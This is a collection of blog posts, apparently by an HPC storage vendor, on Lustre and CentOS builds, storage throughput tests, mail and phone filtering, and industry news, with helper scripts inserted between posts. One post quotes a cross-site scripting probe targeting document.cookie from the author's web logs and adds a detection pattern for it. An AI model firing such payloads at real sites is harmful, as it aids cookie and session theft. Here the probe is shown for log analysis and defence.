[root@usn-ramboot ~]# rpm -qa | grep lustre
kernel-3.10.0-327.13.1.el7_lustre.x86_64
kernel-tools-3.10.0-327.13.1.el7_lustre.x86_64
kernel-devel-3.10.0-327.13.1.el7_lustre.x86_64
lustre-2.8.53_1_g34dada1-3.10.0_327.13.1.el7_lustre.x86_64.x86_64
kernel-tools-libs-devel-3.10.0-327.13.1.el7_lustre.x86_64
lustre-osd-ldiskfs-mount-2.8.53_1_g34dada1-3.10.0_327.13.1.el7_lustre.x86_64.x86_64
kernel-headers-3.10.0-327.13.1.el7_lustre.x86_64
lustre-osd-ldiskfs-2.8.53_1_g34dada1-3.10.0_327.13.1.el7_lustre.x86_64.x86_64
kernel-tools-libs-3.10.0-327.13.1.el7_lustre.x86_64
lustre-modules-2.8.53_1_g34dada1-3.10.0_327.13.1.el7_lustre.x86_64.x86_64

This means that we can run Lustre 2.8.x atop Unison. Still pre-alpha, as I have to get an updated kernel into this, as well as update all the drivers.
Its not perfect, but we have CentOS/RHEL 7.2 and Lustre integrated into SIOS now
Lustre is infamous for its kernel specificity, and it is, sadly, quite problematic to get running on a modern kernel (3.18+). This has implications for quite a large number of things, including whole subsystems with a partial back-porting to earlier kernels … which quite often misses very critical bits for stability/performance. I am not a fan of back porting for features, I am a fan of updating kernels for features. But that is another issue that I’ve talked about in the past.
reason #31659275 not to use java
As seen on Hacker News, linking to an Ars Technica article, this little tidbit. This is the money quote:
I know it seems obvious now to Google and to others, but mebbe … mebbe … they should rethink building a platform in a non-open language? I’ve talked about OSS type systems in terms of business risk for well more than a decade. OSS software intrinsically changes the risk model, so that you do not have a built in dependency upon another stack that could go away at any moment.
isn't this the definition of a Ponzi scheme?
From this article at the WSJ detailing the deflation of the tech bubble in progress now.
A Ponzi scheme is like this:
Every now and then you get an eye opener
This one came while we were conditioning a Forte NVMe unit, and I was running our OS install scripts. Running dstat in a window to watch the overall system …
----total-cpu-usage---- -dsk/total- -net/total- ---paging-- ---system--
usr sys idl wai hiq siq| read  writ| recv  send|  in   out | int   csw
  2   5  94   0   0   0|   0    22G| 218B  484B|   0     0 | 363k  368k
  1   4  94   0   0   0|   0    22G| 486B  632B|   0     0 | 362k  367k
  1   4  94   0   0   0|   0    22G| 628B  698B|   0     0 | 363k  368k
  2   5  92   1   0   0| 536k  110G| 802B 2024B|   0     0 | 421k  375k
  1   4  93   2   0   0|   0    22G| 360B  876B|   0     0 | 447k  377k

Wait … is that 110GB/s (2nd line from bottom, in the writ column)?
there are times
that try my patience. Usually with poorly implemented filtering tools of one form or another. SPF is an anti-spoofing mechanism: it identifies which machines are allowed to send email for your domain name. The tools that purport to test it? Not so good. I get conflicting answers from various tools for a simple SPF record. The online (interactive) tester seems to work, and shows me my config is working nicely.
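To see why testers can disagree, it helps to remember how evaluation works: the terms of `v=spf1 ...` are checked left to right, the first matching mechanism wins, and its qualifier (`+` pass, `-` fail, `~` softfail, `?` neutral) is the result. If nothing matches, the result is neutral. Below is a deliberately partial sketch, not a full RFC 7208 implementation. It evaluates only `ip4`, `ip6`, and `all`, ignores modifiers such as `redirect=`, and reports "undetermined" as soon as it reaches a mechanism (`a`, `mx`, `include`, `exists`, `ptr`) that would need DNS lookups. The function names are hypothetical.

```python
import ipaddress

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
# Mechanisms whose outcome depends on DNS lookups this sketch does not perform.
DNS_MECHANISMS = {"a", "mx", "include", "exists", "ptr"}


def parse_spf(record):
    """Split an SPF TXT record into (result, mechanism, value) tuples."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        raise ValueError("not an SPF record")
    mechanisms = []
    for term in terms[1:]:
        if "=" in term.split(":", 1)[0]:
            continue  # modifiers such as redirect= and exp= are ignored here
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, value = term.partition(":")
        name = name.split("/", 1)[0].lower()  # "a/24" -> "a"
        mechanisms.append((QUALIFIERS[qualifier], name, value))
    return mechanisms


def evaluate_ip(record, ip):
    """First matching mechanism wins; no match means "neutral"."""
    addr = ipaddress.ip_address(ip)
    for result, name, value in parse_spf(record):
        if name == "all":
            return result
        if name in ("ip4", "ip6"):
            network = ipaddress.ip_network(value, strict=False)
            if addr.version == network.version and addr in network:
                return result
        elif name in DNS_MECHANISMS:
            return "undetermined"  # would need DNS to know whether this matches
        # unknown mechanism names are skipped in this sketch
    return "neutral"
```

For records built only from `ip4`/`ip6`/`all`, this gives a quick offline cross-check against whatever an online tester reports.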
Of course, this means more work ahead
Our client code that pulls configuration bits from a boot server works great. But the config it pulls is distribution specific. Where we need to be is distribution/OS agnostic, and set things in a document database. Let the client convert the configuration into something OS specific. This is, to a degree, a solved problem. Indeed, etcd is just a modern reworking of what we did with the client code … using a fixed client (e.
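As a small illustration of “store it OS-agnostic, let the client render it”, here is a sketch that turns one interface record into either a RHEL/CentOS `ifcfg` file or a Debian `/etc/network/interfaces` stanza. The record schema (`device`, `address`) and the function name are hypothetical and are not the format the day job's client uses. Only the output file formats are standard.

```python
import ipaddress


def render_interface(config, distro):
    """Turn one OS-agnostic interface record into a distro-specific config file.

    `config` uses a hypothetical schema: {"device": "eth0", "address": "192.0.2.10/24"}.
    """
    iface = ipaddress.ip_interface(config["address"])
    name = config["device"]
    if distro in ("centos", "rhel"):
        # /etc/sysconfig/network-scripts/ifcfg-<device> style
        lines = [f"DEVICE={name}", "BOOTPROTO=static", "ONBOOT=yes",
                 f"IPADDR={iface.ip}", f"PREFIX={iface.network.prefixlen}"]
    elif distro in ("debian", "ubuntu"):
        # /etc/network/interfaces (ifupdown) style
        lines = [f"auto {name}", f"iface {name} inet static",
                 f"    address {iface.ip}", f"    netmask {iface.network.netmask}"]
    else:
        raise ValueError(f"no renderer for distro {distro!r}")
    return "\n".join(lines) + "\n"
```

The document store only ever holds the neutral record; supporting another distribution means adding a renderer on the client, not changing what the server serves.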
Very preliminary RHEL7/CentOS7 SIOS base support
This is rebasing our SIOS tech atop RHEL7/CentOS7. Very early stage, pre-alpha, lots of debugger windows open … but …
[root@usn-ramboot ~]# cat /etc/redhat-release
CentOS Linux release 7.2.1511 (Core)
[root@usn-ramboot ~]# uname -r
4.4.6.scalable
[root@usn-ramboot ~]# df -h /
Filesystem      Size  Used Avail Use% Mounted on
tmpfs           8.0G  4.7G  3.4G  59% /

Dracut is giving me a few fits, but I’ve finished that side for the most part, and am now into debugging the post-pivot environment.
When spam bots attack
I’ve been fixing up a few mail servers to be more discriminating about their connections. And I noticed that I didn’t have any automated tooling to block the spammers. I have lots of tooling to filter and control things. So I wrote a quick log -> ban list generator. Not perfect, but it seems to work nicely. Like I don’t have enough to do this week. /sigh Meetings tomorrow starting at 8am.
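A log -> ban list generator can be quite small. Below is a sketch, not the generator from this post. It assumes Postfix-style `NOQUEUE: reject: RCPT from host[1.2.3.4]` log lines, counts rejections per client IP, and lists IPs at or above a threshold while skipping allowlisted networks. The threshold of 5 and the function name are hypothetical.

```python
import ipaddress
import re
from collections import Counter

# Assumed Postfix log format: "... NOQUEUE: reject: RCPT from host[1.2.3.4]: ..."
REJECT_RE = re.compile(r"NOQUEUE: reject: RCPT from [^\[]*\[([0-9a-fA-F.:]+)\]")


def ban_list(log_lines, threshold=5, allow=()):
    """Return IPs with at least `threshold` rejected RCPTs, minus allowlisted networks."""
    counts = Counter()
    for line in log_lines:
        match = REJECT_RE.search(line)
        if match:
            counts[match.group(1)] += 1
    allowed = [ipaddress.ip_network(net) for net in allow]
    bans = [
        ip for ip, hits in counts.items()
        if hits >= threshold
        and not any(ipaddress.ip_address(ip) in net for net in allowed)
    ]
    # Sort IPv4 before IPv6, then numerically within each family.
    return sorted(bans, key=lambda ip: (ipaddress.ip_address(ip).version,
                                        ipaddress.ip_address(ip)))
```

How the resulting list is applied (a firewall set, a Postfix access map, etc.) is left open; keeping the allowlist check in the generator avoids accidentally banning your own networks.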
Why sticking with distro packages can be (very) bad for your security
I’ve been keeping a variety of systems up to date, updating security and other bits with zealous fervor. Security is never far from my mind, as I’ve watched bad practices at customers result in any number of things … from minor probes, through (in one case, with a grad student impacted by a Windows keylogger) taking down a Linux cluster, but not before knocking the university temporarily off the internet.
Not-so-modern file system errors in modern file systems
On a system in heavy production use, using an underlying file system for metadata service, we see this:
kernel: EXT4-fs warning: ext4_dx_add_entry:1992: Directory index full!

Ok, where does this come from? Ext3 had a limit of 32000 directory entries per directory, unless you turned on the dir_index feature. Ext4 theoretically has no limit. Well, it’s 64000 if you don’t use dir_index. Which we do use. Really the feature you want is dir_nlink.
SIOS-metrics being updated soon with our process table sampler
I needed to look at processes on the machine I’d been spending time debugging: what was running, its state, its allocations, its IO, etc. Something was causing a hard panic, and it seemed correlated with an application issue. I didn’t have a process space sampler, so I wrote one. It takes one sample per second right now (configurable) across the whole process space, and normally uses about 1% CPU.
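A bare-bones version of such a sampler on Linux reads `/proc/<pid>/stat` for every process once per interval. The sketch below is not the SIOS-metrics code. It follows the field numbering in proc(5), splits around the last `)` because the command name may itself contain spaces or parentheses, and tolerates processes that exit mid-scan. It does not collect per-process IO, which lives in `/proc/<pid>/io` and usually needs elevated privileges. The function names are hypothetical.

```python
import os
import time


def parse_stat(line):
    """Parse one /proc/<pid>/stat line (see proc(5)) into a few useful fields."""
    # comm may contain spaces and parentheses, so split around the last ")".
    lpar, rpar = line.index("("), line.rindex(")")
    rest = line[rpar + 2:].split()  # rest[0] is field 3 (state)
    return {
        "pid": int(line[:lpar]),
        "comm": line[lpar + 1:rpar],
        "state": rest[0],
        "ppid": int(rest[1]),
        "utime": int(rest[11]),        # field 14, clock ticks
        "stime": int(rest[12]),        # field 15, clock ticks
        "num_threads": int(rest[17]),  # field 20
        "vsize": int(rest[20]),        # field 23, bytes
        "rss_pages": int(rest[21]),    # field 24, pages
    }


def sample_processes(proc="/proc"):
    """Take one snapshot of every process visible under /proc."""
    snapshot = []
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc, entry, "stat")) as handle:
                snapshot.append(parse_stat(handle.read()))
        except (FileNotFoundError, ProcessLookupError, PermissionError):
            continue  # the process exited (or is hidden) between listdir and read
    return snapshot


def sample_forever(interval=1.0):
    """Yield (timestamp, snapshot) pairs, one per `interval` seconds."""
    while True:
        yield time.time(), sample_processes()
        time.sleep(interval)
```

Diffing `utime`/`stime` between consecutive snapshots gives per-process CPU use over the interval, which is usually the first thing to correlate against a crash timeline.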
Caught a not-so-cool bug in a hypervisor running on a production machine
Not naming names. It’s a good product. It just gives up the ghost when you request 1.5x available memory, and the OS actually tries … tries … to fulfill the request. I thought I had set the maximum oversubscription amount to 85% of swap + physical. Yet, along came a nice spike and WHAMMO. Down the machine went. That this was a high visibility production machine, with hard uptime requirements … not so good.
Sadly we can't afford the time or people to go to BioIT world expo next week
Short handed + lots of very near term projects + many things that demand our attention == us pulling out. I wish it was otherwise, but we have limited people bandwidth, and I can’t afford 2 days doing booth duty while we have hard deliverables. /sigh Maybe 2017. We’ll see. And no, even though HPC on Wall Street is the same time, we aren’t going to that either. I like the show, but same issue with timing/people/projects.
Posts
Ways to not reach me
I’ve implemented a very strict policy for inbound phone calls. If I don’t recognize the number, it goes to voicemail. If it’s important enough to call me, it’s important enough to leave me a message. If a call comes in with an unknown number, I won’t answer it. It can go through to voicemail. If it comes through with a restricted number, it only goes through to voicemail, though I am starting to think that such calls should be automatically blocked (as in never even given the opportunity to go to voicemail).
Posts
Spent the day fighting with a database that did not honor "be liberal in what you accept"
To put it bluntly, its escaping not only doesn’t match its docs, but appears to be internally inconsistent. I kept getting errors that google couldn’t really find much on, other than to suggest they were fixed bugs. I might have something to say on that. Looking forward to the next phase of this work, where we skip this db and focus on kdb+.
Posts
Not even breaking a sweat: 10GB/s write to single node Forte unit over 100Gb net #realhyperconverged #HPC #storage
TL;DR version: 10GB/s write, 10GB/s read in a single 2U unit over a 100Gb network to a backing file system. This is tremendous. The system and clients are using our default tuning/config. Real hyperconvergence requires hardware that can move bits to/from storage/networking very quickly. This is that. These units are available. Now. In volume. And are very reasonably priced (starting at $1 USD/GB). Contact us for more details. This is with a file system …
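To put 10GB/s in context against a 100Gb link, it helps to convert bits to bytes. A quick sketch, assuming decimal units (GB = 10^9 bytes) and ignoring Ethernet/IP/TCP framing overhead:

```python
def gbit_to_gbyte(gbit_per_s):
    """Convert a link rate in Gb/s to GB/s (8 bits per byte, decimal units)."""
    return gbit_per_s / 8


def link_utilization(observed_gbyte_per_s, link_gbit_per_s):
    """Fraction of the raw line rate that an observed throughput represents."""
    return observed_gbyte_per_s / gbit_to_gbyte(link_gbit_per_s)


if __name__ == "__main__":
    print(f"100Gb line rate: {gbit_to_gbyte(100)} GB/s")
    print(f"10 GB/s is {link_utilization(10, 100):.0%} of it")
```

A 100Gb link tops out at 12.5 GB/s raw, so 10 GB/s is 80% of the raw line rate. Since protocol framing eats part of that 12.5 GB/s, the share of the actually usable bandwidth is higher still.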
Posts
Massive unapologetic storage firepower part 4: On the test track with a Forte unit ... vaaaaROOOOOOMMMMMMM!!!!!
I am trying to help people conceptualize the experience. Here is a video depicting very fast, very powerful cars and their sound signatures.
This is a good start. Take one of those awesome machines, and turn off half the engine. So it is literally running with 1/2 of its power turned off. Remember this. There will be a quiz. As we flippantly noted in the video, this is face-melting performance. Had I any hair left, it would have been blown way back.
Posts
Just another day, debugging someone's installer
I like the installers that attempt (and then fail) to calculate what they need, and generate installation target names programmatically. I know … I know … it’s an attempt to reduce the level of pain for some folks, as the algorithm works for some sets of inputs. But not mine. And mine are valid. What we need is an --I_know_what_the_heck_I_am_asking_for_so_please_just_do_the_install switch. Barring that, I have their installer (thankfully non-terrible Perl code) up in an editor to see if I can find the offending part, so I can patch it (and send them the patch).
Posts
What a difference a CEO makes
So Microsoft will be starting to produce Linux software. This would never have happened under the previous CEO. With this change, Microsoft’s addressable market just grew fairly significantly for this product. Of course, there are ways for them to mess this up. Such as if they have features only available under windows. That would rather permanently consign this product to the dustbin of history. This said, I am hopeful that this CEO gets it, and will make sure that the changes Microsoft needs to make, are, in fact, made.
Posts
One of those days where you search for information on a problem
and find that you wrote to a mailing list about it almost half a decade ago, and that it still hasn’t been fixed. This is a little sad.
Posts
Fixed the asymmetric problem by moving to a different switch/network
Long story, but it was a time-sensitive POC bug. I like the switch I was using, but we needed this up ASAP. The customer was waiting. So I yanked all the 40GbE cards from the servers, put in multiport 10GbE, and set up 802.3ad LAGs. Then I moved to the Arista in the lab (great switch BTW). It’s been years since I set one up, so out came the manual. Read up on setting up the LAGs and port channels … I had forgotten why I liked using them so much.
Posts
Cool asymmetric network performance happened to mess up a customer benchmark
A bunch of Unison systems, a 40GbE network interconnecting them, and a bunch of client nodes on 40GbE -> 4x 10GbE links (to accommodate enough clients for the load testing). 40GbE <-> 40GbE works great. Full bandwidth, only minor oddities (single thread performance around 27Gb/s, need multiple threads to hit 40). 10GbE <-> 10GbE works great. Full bandwidth, nothing odd. 10GbE -> 40GbE works great, getting about the expected bandwidth (10GbE).
Posts
Interesting ... so will they be sued for patents
Turns out the next Ubuntu is fully baking ZFS into the kernel and distributing it. This seems directly contrary to the licensing (CDDL vs GPL), and chances are some folks will be unhappy with it. The big question is, will the IP holders sue? Because if they don’t, they may actually have given up their right to sue. Or has Canonical obtained a license to distribute? This is my understanding, but I am not a lawyer, so I can’t really be sure of this (and I’d recommend you ask one if you are not sure).
Posts
New tool to help visualize /proc/interrupts and info in /proc/irq/$INT/
This is a start, not ready for release yet, but already useful as a diagnostic tool. I wanted to see how my IRQs were laid out, as this has been something of a persistent problem. I’ve built some intelligence into our irqassign.pl tool, but I need a way to see where the system is investing most of its interrupts. I omit (on purpose) IRQs that have been assigned, but have generated no interrupts.
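The tool described above isn’t shown. As an illustration of the core idea only, here is a minimal Python sketch that parses `/proc/interrupts`, drops IRQs that are assigned but have never fired, and ranks the rest by total count. Note that rows like `ERR`/`MIS` carry fewer numeric columns than there are CPUs, so the parser stops at the first non-numeric field rather than assuming a fixed width. The output layout is my own choice.

```python
def parse_interrupts(text):
    """Parse /proc/interrupts text into (ncpu, rows).

    Each row is (label, per_cpu_counts, description). Rows such as ERR/MIS
    carry fewer numeric columns than there are CPUs, so we stop at the
    first non-numeric field.
    """
    lines = text.strip("\n").splitlines()
    ncpu = len(lines[0].split())            # header: CPU0 CPU1 ...
    rows = []
    for line in lines[1:]:
        if ":" not in line:
            continue
        label, rest = line.split(":", 1)
        fields = rest.split()
        counts = []
        for field in fields:
            if len(counts) == ncpu or not field.isdigit():
                break
            counts.append(int(field))
        rows.append((label.strip(), counts, " ".join(fields[len(counts):])))
    return ncpu, rows


def active_irqs(text):
    """(irq, total, per_cpu_counts, description), busiest first.
    IRQs that are assigned but have never fired are omitted."""
    _, rows = parse_interrupts(text)
    active = [(irq, sum(c), c, desc) for irq, c, desc in rows if sum(c) > 0]
    return sorted(active, key=lambda row: row[1], reverse=True)


if __name__ == "__main__":
    with open("/proc/interrupts") as f:
        for irq, total, counts, desc in active_irqs(f.read()):
            busiest = max(range(len(counts)), key=counts.__getitem__)
            share = counts[busiest] / total
            print(f"{irq:>6} {total:>12}  CPU{busiest} {share:5.1%}  {desc}")
```

The per-IRQ "busiest CPU and its share" column is a cheap way to spot interrupt sources that are all landing on one core.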
Posts
Not sufficiently caffeinated for technical work today
I just spent 30 minutes trying to figure out why the 32 bit q process would run on one machine, while the identical tree and config would fail with a license-expired error on my desktop (development box). Turns out one should check for an old license file in one’s home directory. /sigh I think I need to send an RFE for a ‘--low-coffee-mode’ option.
Posts
Radio Free HPC is (as usual) worth a listen
Good wrap-up of last year’s trends this week on the InsideHPC Radio Free HPC podcast. We get a small mention around 10:50 or so. That’s not why it’s an especially good listen. The team arrived at many of the same conclusions we did last year, which is why we brought out Forte, and we have some additional products planned in that line for later in the year. Basically NVM and variants, NVMe, etc.
Posts
"Unexpected" cloud storage retrieval charges, or "RTFM"
An article appeared on HN this morning. In it, the author noted that all was not well with the universe, as their backup, using Amazon’s Glacier product, wound up being quite expensive for a small backup/restore. The OP discovered some of the issues with Glacier when they began the restore (not commenting on performance, merely the costing). Basically, to lure you in, they provide very low up front costs. That is, until you try to pull the data back for some reason.
Posts
Container jutsu
Linux containers are all the rage, with Docker, rkt, lxd, etc. all in market to various degrees. You have companies like Docker, CoreOS, and Rancher all vying for mindshare, not to mention some of the plumbing bits by google and many others. I don’t think they are a fad, there is much that is good with containers, when they are done right. To see how they are done right, have a good hard long look at SmartOS.
Posts
Hard filtering of calls
I find that, over time, my cell phone number has propagated out to spammers/scammers who want to call me up to sell me something. The US national do-not-call registry hasn’t helped. The complaints I’ve filed haven’t helped. So I filter. My filtering algo looks like this:

    if (number_is_known_person_or_org(phone_number)) {
        take_call_if_possible();
    } else if (number_is_unknown(phone_number)) {
        filter_stage_2(phone_number);
    }

    function filter_stage_2(phone_number) {
        // I ignore 80% of numbers I don't know, let them go to
        // voicemail.
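The first stage of the pseudocode above translates directly into runnable Python. This is a sketch only: the contact list and phone numbers are hypothetical, and because only the opening comment of `filter_stage_2` appears in the post, the stub below simply sends every unknown number to voicemail rather than guessing at the rest of that stage.

```python
from enum import Enum


class Action(Enum):
    ANSWER = "answer"
    VOICEMAIL = "voicemail"


# Hypothetical contact list; a real one would come from the phone's address book.
KNOWN_NUMBERS = {"+15555550100", "+15555550123"}


def number_is_known_person_or_org(phone_number):
    return phone_number in KNOWN_NUMBERS


def filter_stage_2(phone_number):
    # Only the start of stage 2 is shown in the post: unknown numbers are
    # (mostly) ignored and left to voicemail. This stub sends all of them there.
    return Action.VOICEMAIL


def route_call(phone_number):
    """Stage 1: answer known callers; hand everything else to stage 2."""
    if number_is_known_person_or_org(phone_number):
        return Action.ANSWER  # take_call_if_possible() in the pseudocode
    return filter_stage_2(phone_number)


if __name__ == "__main__":
    for number in ("+15555550100", "+15555559876"):
        print(number, route_call(number).value)
```

Since "unknown" is just "not known", a plain `else` covers the pseudocode’s `number_is_unknown` branch.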
Posts
Nutanix files for IPO
Short story here. I am not going to pore over their S-1 form to find interesting tidbits; others will do that, and are paid to do so. They are the first of several, though I had thought that Dell would acquire them before they hit IPO. I am guessing that the combination of their price plus the EMC acquisition stopped this conversation. So now Nutanix is going to IPO.
Posts
Toshiba contemplating spinning out NAND flash
This is remarkable if true, and if they follow through with it, it will change the landscape of Flash quite a bit. Right now there are 43 major flash providers, and a few smaller ones. Building flash fabs is expensive, even given the demand and process improvements, there is still quite a bit of investment required to set up a flash fab. Toshiba has some cool kit here, we’ve worked with it (and in full disclosure, we were talking about working more closely with them in the past).
Posts
Google GMail is broken, not passing emails, losing others
Yeah, the headline says it all. The reason I rolled to GMail (and am paying for it for each user and then some) for the corporate services was, well, they promised to make running email easy, painless, and I wouldn’t have to worry about email management any more. Now I have to worry about pissed off customers who are angry at me for not responding, even though I see the outbound emails in my sent folder, and from our ticketing system.
Posts
M&A: NetApp grabs SolidFire
This one has been in the rumor mill for a while. NetApp has been needing something to play well in the all flash array space, and it now has something. This said, the array space is very much on the decline certainly with respect to dumb JBODs and smart “filer heads”. That design is being retired in favor of smarter and hyperconverged systems. Such as Unison with Ceph, Forte, and related HCI (hyper converged infrastructure) systems.
Posts
Good read on market sizing for VCs and entrepreneurs
Not a how to guide, but a higher level meta discussion … about that market size discussion. See here. I’ve experienced the endless cycle of meetings over “size of market”. Not fun. These days, I have a very simple classifier with respect to investors.
foreach investor (list_of_investors) { if (investor->says_yes_sends_term_sheet_and_check) { put_money_to_work_building_value() } else { add_to_list_of_investors_who_didnt_say_yes_and_follow_through_with_money() } } This is pseudo code for the algo you need. Any answer which is yes is good.
Posts
Bots on Amazon?
Seeing lots of these in my web server logs:
`https://scalableinformatics.com/?p=%3Cscript%3Ealert(document.cookie)%3C/script%3E` which are sent there from a sentinel redirection mechanism on a different web server. A number of Amazon hosts, maybe 10 or so, are now doing this. I am guessing this would be real darned easy to trace back to the sources. And either someone’s instance in the cloud is not under their control, or someone is paying Amazon to let them run bots.
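Percent-decoding that query string gives `<script>alert(document.cookie)</script>`, a classic cross-site scripting probe. Below is a small sketch for pulling such probes, and the IPs sending them, out of an access log. Two assumptions to flag: the log is in the common Apache/nginx "combined" format, and the pattern list is a deliberately tiny, hypothetical one, not a complete XSS detector.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Deliberately small, hypothetical pattern list; real filtering belongs in a
# WAF or in the application's own output escaping.
SUSPICIOUS = re.compile(r"<\s*script|javascript:|document\.cookie", re.IGNORECASE)


def is_xss_probe(url):
    """True if any percent-decoded query key or value looks like script injection."""
    for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if SUSPICIOUS.search(key) or SUSPICIOUS.search(value):
            return True
    return False


def probe_sources(log_lines):
    """Count probe requests per client IP in combined-format access log lines."""
    hits = Counter()
    for line in log_lines:
        parts = line.split('"')
        if len(parts) < 2:
            continue
        request = parts[1].split()          # e.g. ["GET", "/?p=...", "HTTP/1.1"]
        if len(request) >= 2 and is_xss_probe(request[1]):
            hits[line.split()[0]] += 1       # first field is the client address
    return dict(hits)
```

`parse_qsl` does the percent-decoding, so the regex only ever sees the decoded text and doesn’t have to match every encoding of `<`.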
Posts
Watching dracut, udev, systemd, and plymouth all battle each other for nfs/ramboot
I can’t even begin to describe the complete and utter brokenness of this mess. This doesn’t look like a systemd issue; it’s just the poor stack trying to get everything else working. But plymouth. Seriously. It should be given the old-yeller treatment. And watching udev not … settle … is … amusing. While it’s doing that, the dracut options of debug, drop to a shell, break, etc. aren’t working. This isn’t engineering at this point.
Posts
Testing a new @scalableinfo Unison #Ceph appliance node for #hpc #storage
Simple test case, no file system … using raw devices, what can I push out to all 60 drives in 128k chunks. Actually this is part of our burn-in test series, I am looking for failures/performance anomalies.
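| cpu usr | cpu sys | cpu idl | cpu wai | cpu hiq | cpu siq | dsk read | dsk writ | net recv | net send | paging in | paging out | system int | system csw |
|---:|---:|---:|---:|---:|---:|---:|---:|---:|---:|---:|---:|---:|---:|
| 0 | 1 | 95 | 5 | 0 | 0 | 513M | 0 | 480B | 0 | 0 | 0 | 10k | 20k |
| 4 | 2 | 94 | 0 | 0 | 0 | 0 | 0 | 480B | 0 | 0 | 0 | 5238 | 721 |
| 0 | 2 | 98 | 0 | 0 | 0 | 0 | 0 | 480B | 0 | 0 | 0 | 4913 | 352 |
| 0 | 2 | 98 | 0 | 0 | 0 | 0 | 0 | 570B | 90B | 0 | 0 | 4966 | 613 |
| 0 | 2 | 98 | 0 | 0 | 0 | 0 | 0 | 480B | 0 | 0 | 0 | 4912 | 413 |
| 0 | 2 | 98 | 0 | 0 | 0 | 0 | 0 | 584B | 92B | 0 | 0 | 4965 | 334 |
| 0 | 2 | 98 | 0 | 0 | 0 | 0 | 0 | 480B | 0 | 0 | 0 | 4914 | 306 |
| 0 | 2 | 98 | 0 | 0 | 0 | 0 | 0 | 636B | 147B | 0 | 0 | 4969 | 483 |
| 0 | 2 | 98 | 0 | 0 | 0 | 0 | 0 | 570B | 0 | 0 | 0 | 4915 | 377 |
| 8 | 8 | 50 | 32 | 0 | 2 | 7520k | 8382M | 578B | 0 | 0 | 0 | 76k | 215k |
| 9 | 7 | 30 | 52 | 0 | 3 | 8332k | 12G | 960B | 132B | 0 | 0 | 109k | 279k |
| 10 | 5 | 29 | 53 | 0 | 2 | 4136k | 12G | 240B | 0 | 0 | 0 | 109k | 277k |
| 12 | 6 | 29 | 51 | 0 | 2 | 4208k | 12G | 240B | 0 | 0 | 0 | 108k | 280k |
| 11 | 6 | 31 | 50 | 0 | 2 | 2244k | 12G | 330B | 90B | 0 | 0 | 109k | 281k |
| 11 | 6 | 30 | 50 | 0 | 3 | 2272k | 13G | 240B | 0 | 0 | 0 | 110k | 281k |

Writes around 12.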
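To turn the dstat `writ` column into a single number, and a per-drive figure across the 60 drives, a small parser is enough. Two assumptions to flag: dstat’s byte suffixes are treated here as 1024-based (k = KiB, M = MiB, G = GiB), and the 1 GiB/s "busy" cutoff used to drop the idle seconds before the test starts is an arbitrary, hypothetical choice.

```python
# dstat's byte suffixes; assumed here to be 1024-based (k = KiB, M = MiB, ...).
SCALE = {"B": 1, "k": 1024, "M": 1024**2, "G": 1024**3, "T": 1024**4}


def parse_dstat_size(field):
    """Convert a dstat size field such as '8382M' or '12G' to bytes."""
    field = field.strip()
    if field and field[-1] in SCALE:
        return float(field[:-1]) * SCALE[field[-1]]
    return float(field)


def mean_busy_rate(column, busy_threshold=1024**3):
    """Average of the samples at or above busy_threshold bytes/s, so the
    idle seconds before the test starts don't drag the mean down."""
    busy = [v for v in map(parse_dstat_size, column) if v >= busy_threshold]
    return sum(busy) / len(busy) if busy else 0.0


if __name__ == "__main__":
    # The dsk/total "writ" column from the run above.
    writ = ["0"] * 9 + ["8382M", "12G", "12G", "12G", "12G", "13G"]
    rate = mean_busy_rate(writ)
    drives = 60
    print(f"{rate / 1024**3:.1f} GiB/s total, "
          f"{rate / drives / 1024**2:.0f} MiB/s per drive")
```

The first busy sample (8382M) is partly ramp-up. For a pure steady-state figure, raise the threshold or drop that row.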
Posts
10TB PMR drives for Unison #hpc #storage systems, think 600TB/4U unit with @BeeGFS, @Ceph, and others
WD/HGST just released details on a PMR (aka “real”, non-archive class) hard disk. You can read the specs here. We will be offering these in Unison HPC storage systems, to provide up to 600TB per 4U unit, or up to 6PB per rack of 10 Unison chassis. Coupled with our 100Gb fabric, we expect to be able to drive about 8-9 GB/s per chassis. And that’s before we leverage the distributed journaling/metadata NVMe drives rear-mounted on the units.
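The capacity numbers follow from simple multiplication. Here is a sketch of the rack math. The 60 drives per chassis is inferred from 600TB / 10TB rather than stated outright, the 8-9 GB/s per chassis is the expectation quoted above, and all capacities are raw (before RAID, erasure coding, or replication).

```python
def rack_summary(drive_tb=10, drives_per_chassis=60, chassis_per_rack=10,
                 chassis_rack_units=4, chassis_gbyte_s=(8, 9)):
    """Raw capacity and aggregate streaming bandwidth for a rack of chassis.
    Capacities are raw (before RAID, erasure coding, or replication)."""
    chassis_tb = drive_tb * drives_per_chassis
    return {
        "chassis_tb": chassis_tb,
        "rack_pb": chassis_tb * chassis_per_rack / 1000,
        "rack_units": chassis_rack_units * chassis_per_rack,
        "rack_gbyte_s": tuple(bw * chassis_per_rack for bw in chassis_gbyte_s),
    }


if __name__ == "__main__":
    for key, value in rack_summary().items():
        print(f"{key}: {value}")
```

Ten 4U chassis take 40U, which leaves a few rack units for switching in a standard 42U rack.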
Posts
Video interview: face melting performance in #hpc #nvme #storage @scalableinfo
Oh no … we didn’t say “face melting” … did we? Oh. Yes. We. Did. The interview is here at the always wonderful InsideHPC.com. You can see the video itself here on YouTube, but read Rich’s transcript. I was losing my voice, and he captured all of the interview in text. Take-home messages: insane IO/networking/processing performance, small footprint, tiny price, available for orders now.
Posts
There are no silver bullets, 2015 edition
In Feb 2013, I opined (with some measure of disgust) that people were looking at various software packages as silver bullets, these magical bits of a stack which could suddenly transform massive steaming piles of bits (big … uh … “data” ?) into golden nuggets of actionable data. Many of the “solutions” marketed these days are exactly like that … “add our magic bean software to your pipeline and you will gain insight faster.
Posts
A wonderful read on metrics, profiling, benchmarking
Brendan Gregg’s writings are always interesting and informative. I just saw a link on Hacker News to a presentation he gave on “Broken Performance Tools”. It is wonderful, and succinctly explains many things I’ve talked about here and elsewhere, but it goes far beyond what I’ve grumbled over. One of my favorite points in there is slide 83: “Most popular benchmarks are flawed”, with a pointer to a paper (easy to google for).
Posts
Massive Unapologetic Firepower part 3: Forte
Forte has uncloaked, website is being updated. You can email me (landman@scalableinformatics.com) for more info. Pictures speak louder than words. Have a look.
That is 20+ GB/s for streaming sequential IO. Then, 4kB random reads …
